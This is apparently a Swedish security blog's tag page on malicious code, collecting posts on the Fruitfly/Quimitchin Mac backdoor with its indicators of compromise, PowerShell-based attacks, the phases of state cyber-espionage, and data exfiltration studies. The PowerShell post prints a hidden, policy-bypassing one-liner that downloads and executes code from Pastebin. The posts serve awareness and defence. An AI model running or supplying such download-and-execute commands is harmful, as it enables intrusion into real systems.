Taggat med: skadlig kod

Årets första skadliga kod till Mac upptäckt

Det är företaget Malwarebytes som upptäckt den första skadliga koden till macOS (tidigare Mac OS X). Det är en bakdörr som går under namnet OSX.Backdoor.Quimitchin

Denna skadlig kod har identifierats hos biomedicinska forskningsanläggningar och har troligtvis utvecklas runt 2013-2014. Även så misstänker Malwarebytes att det finns en Windows-version av denna skadlig kod eftersom VirusTotal har identifierat Windows-binärer som pratar med samma C&C-server (Command and Control):

99.153.29.240
eidk.hopto.org

I övrigt använder den skadliga koden de klassiska tricken som att skriva ut en uppstartsfil för exekvering till ~/Library/LaunchAgents/com.client.client.plist

Även skrivs ett antal filer ner till disk som är skrivna i Java samt Perl. Dessa filer innehåller i sin tur kommandon för både Linux och macOS såsom xwd och macOS motsvarighet screencapture.

Nu har även Apple lagt in denna skadlig kod i det inbyggda antivirus-programmet Gatekeeper till macOS. Apple kallar denna skadliga kod för Fruitfly.

Det är i dagsläget oklart hur denna skadliga kod sprids.

IOC:er att titta efter (indicators of compromise)

SHA256: 94cc470c0fdd60570e58682aa7619d665eb710e3407d1f9685b7b00bf26f9647
SHA256: 694b15d69264062e82d43e8ddb4a5efe4435574f8d91e29523c4298894b70c26
SHA256: 83b712ec6b0b2d093d75c4553c66b95a3d1a1ca43e01c5e47aae49effce31ee3
SHA256: ce07d208a2d89b4e0134f5282d9df580960d5c81412965a6d1a0786b27e7f044
SHA256: b556c04c768d57af104716386fe4f23b01aa9d707cbc60385895e2b4fc08c9b0
SHA256: bbbf73741078d1e74ab7281189b13f13b50308cf03d3df34bc9f6a90065a4a55

Cyberangrepp som använder PowerShell ökar

Powershell är ett avancerat skript-språk till Windows som funnits i över 10 år där målet är att byta ut klassiska CMD.exe i framtiden (DOS-kommandotolk). Exempelvis så är standardskalet i Windows 10 just PowerShell. PowerShell är också populärt bland Windows-administratörer för dess förmåga att underlätta admin-arbete och har många olika funktioner vilket även gör det populärt för skadlig kod.

Enligt säkerhetsföretaget Symantec så är 95.4% av alla analyserade powershell-skript skadliga och många organisationer saknar förmåga att upptäcka skadliga powershell-skript uppger företaget. Detta för att loggningen är bristfällig i standardkonfigurationen. Att obfuskera och ändra i powershell-skript och således undgå enklare kontroller i form av strängmatchning och checksummor är också trivialt.

Den senaste alfa-versionen av PowerShell som heter version 6 har utökat stöd för loggning och flertalet olika säkerhetshöjande funktioner.

Följande PowerShell-versioner används som standard i Microsofts olika operativsystem:

Det finns PowerShell-skript för nästan allt, från att skapa ett nätverkssniffer eller för läsa ut lösenord. Vissa hot, t.ex. som Trojan.Kotver som försöker att ladda hem och installera PowerShells-ramverk om den inte är installerad på den infekterade datorn. Även så stödjer PowerShell att ladda hem och exekvera kod direkt i minnet vilket kan försvåra forensiska undersökningar.

Exempel på kod som laddar ner och exekverar kod från Pastebin:

powershell -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient). DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”

Följande 37-sidiga whitepaper från Symantec innehåller en hel del matnyttigt:

Så cyberspionerar främmande makt på Sverige

cyberspionage

Hur går det egentligen till när antagonister genomför cyberattacker mot Svenska intressen? Jag kommer nedan redogöra ett antal metoder som gör att stater med mycket kapacitet kan infiltrera svenska företag och myndigheter för att sedan stjäla klassificerad information med hjälp av exfiltration.

cyberspionage tidslinje

1. Planeringsfas

Operationer på cyberarenan är välplanerade och därför är samtliga steg är planerade i minsta detalj. Men även även den bästa kan göra fel och avslöja eller läcka information. Det kan röra sig om utveckling av skadlig kod där metadata finns kvar som avslöjar sökvägar eller tidszoner.

Planeringen handlar även om hur mycket resurser som behövs och eventuell programvara som utvecklas eller införskaffas för operationen.

Även så kan flertalet avdelningar koordineras innan, ska HUMINT och SIGINT användas innan så måste detta även planeras i förväg.

2. Kartläggningsfas

Här kartläggs individer, datornätverk, leverantörer, konsulter och nyckelpersoner på Cyberkartläggningorganisationen. Vilka resor är planerade och vilka resebolag används, kan en inresa i landet nyttjas för att tömma en laptop på information eller planera avlyssningsutrustning i tangentbordet exempelvis.

Nyckelpersoners personliga nätverk kartläggs och förehavanden av dessa i sociala medier söks av efter förekomster av intressant information. Används LinkedIn av medarbetar och hur ansluts organisationen till Internet samt används VPN-anslutningar.

Finns det partnerorganisationer som kan tänkas ansluta mot målet eller har organisationen filialer eller annan verksamhet som är på annan ort som inte är lika skyddad.

Företag i Sverige skyltar gärna med att dom har säkerhetsskyddsavtal med FMV och några frågor till respektive registratorfunktion hos några myndigheter så kan mycket information inhämtas med stöd av offentlighetsprincipen.

3. Implantat

USBG-1680Skadlig kod och specialskriven zero-days används troligtvis för att genomföra intrång och erhålla ett fotfäste i organisationen. CD/DVD-Skivor eller USB-minnen med mjukvaruuppdateringar som innehåller bakdörrar kan skickas till organisationen efter att tidigare offentliga upphandlingar granskas. Även kan tangentbord, möss, hårddiskar eller annat innehålla bakdörrar redan vid leverans från leverantör.

Även kan trådlösa nätverk knäckas hemmavid där stor datorkapacitet finnes, och detta gäller inte enbart trådlösa nätverk ute hos målorganisationen men även på hemmanätverk hos personal som jobbar på organisationen. Eller varför knäcka lösenordet när en mobiltelefon eller annan enhet som innehåller Wifi-lösenordet kan temporärt lånas.

Riktad skadlig kod skickas även till respektive familjemedlem som kanske även använder den dator som sedan kopplas upp mot organisationens nätverk. Phishing som ser ut att komma från någon välkänd tjänst som den enskilde använder såsom LinkedIn, Facebook eller liknande.

Observera att dessa fyra faser kan pågå under flera år, upp till 10 års tid har undersökningar av skadlig kod påvisat.

Även kan främmande staters signalspaningsmyndighet användas för att leverera implantat när exempelvis mjukvara laddas ner från Internet som ej kontrolleras med signatur eller checksumma i efterhand.

4. Exfiltration

Denna fas handlar om att skicka ut information ur organisationens nätverk. Troligtvis klassificerad information men detta genomförs ej i första steg. Den första informationen som exfiltreras innefattar sådant som kan behövas för att kartlägga organisationen ytterligare. Det kan vara datornamn, IP-adresser och sådant som kan ligga till grund för en djupare penetrering av IT-infrastrukturen.

Den specialskrivna mjukvara som står för exfiltrationen har troligtvis ett antal moduler som testar olika sätt att skicka ut information såsom Dropbox, FTP, DNS, HTTPS och E-post via kända E-postprogram.

Mjukvaran har även en funktion som kan detektera om den är på ett nätverk som är fysiskt åtskilt från Internet och då kan nyttja metoder för att ”hoppa över luftgap” (USB-minne, högtalare/mikrofon etc).

5. Upprensning

Att dölja spår är viktigt för att undanröja modus operandi. För alla steg ovan avslöjar små detaljer om antagonisten som kan användas vid IT-forensiska undersökningar och reverse-engineering.

upprensningNågra metoder som används är att individuellt kryptera olika moduler med olika algoritmer och krypteringsnycklar som enbart dekrypteras när speciella fall uppfylls. Såsom att en viss mjukvara finnes installerad på måldatorn på en viss sökväg (detta kommer från kartläggningsfasen).

Servrar som placeras ut på Internet som sköter Command and Control (C2C) måste vara förberedda för att snabbt destrueras (läs om digitala sprängkistor).

Sammanfattningsvis

Med hjälp av ovan steg så skulle jag påstå att samtliga organisationers skydd skulle brista förr eller senare. Som vanligt gäller det att använda lökprincipen och försöka minimera eventuell skada i tidigt skede.

Av stor vikt är även att det finns väl fungerade intrångsskydd och spårbarhet finns på alla ställen. Fysiskt separerade nätverk och skydd mot röjande signaler (RÖS/TEMPEST) kan givetvis också hjälpa samt kanariefåglar utplacerade.

Och största skillnaden mellan cyberangrepp från just en främmande stat och hackers, organiserad brottslighet etc är resurserna. I form av antalet zero-days, beräkningskraft, SIGINT och uthållighet. Men det kan även hända att stater anlitar hackergrupper för informationsstölder, vilket gör det svårt att urskilja bakomliggande aktör.

Exfiltration av data (information)

Presentationen som jag höll under Internetdagarna 2014 i spåret som OWASP Sweden anordnade hittas nedan. Presentationen handlade om hur skadlig kod stjäl information från system via olika kanaler samt hur denna exfiltration kan upptäckas.

Tyvärr blev formateringen inte helt optimal när presentationen laddades upp till Slideshare.

Ny studie från FireEye och KPMG

KPMG Sverige har tillsammans med FireEye placerat ut 14 stycken enheter enligt nedan skiss. Målet är att undersöka hur många riktade attacker dessa organisationer utsätts för samt om någon exfiltration av information genomförs.

FireEye

Resultatet av studien visar på att 51% av attackerna är okända sedan tidigare samt att hela 79% av organisationerna fick information exfiltrerad.

Totalt identifierades 195 unika binärer med skadlig kod där 52% av dessa ej identifierades som skadlig kod av de 53 antivirus-leverantörerna som användes.

Att riktade attacker blir vanligare och vanligare är så klart något som framhävts under en längre tid men att så pass många organisationer blir utsatta för skadlig kod som ej upptäcks av anti-virus är så klart anmärkningsvärt.

Studien kan i sin helhet laddas hem här som PDF:KPMG FireEye Studie

 

 

Användningen av Tor har fördubblats

Nyligen så påpekade Roger Dingledine som är projektledare för anonymiseringstjänsten Tor att användningen har fördubblats på kort tid:

Tor användare

 

Och vad detta kan bero på diskuteras flitigt, några teser som lagts fram är följande:

  • The Pirate Bays webbläsare Pirate Browser som använder Tor
  • Människor är rädda för underrättelsetjänster såsom NSA i samband med läckor från Snowden
  • Google Play öppnade nyligen för användare från Syrien. Dessa kan då använda Tor-klienter i Android-telefoner
  • En av de länder som ökat mest är Vietnam (se statistik här)
  • Skadlig kod (botnet) som nyttjar Tor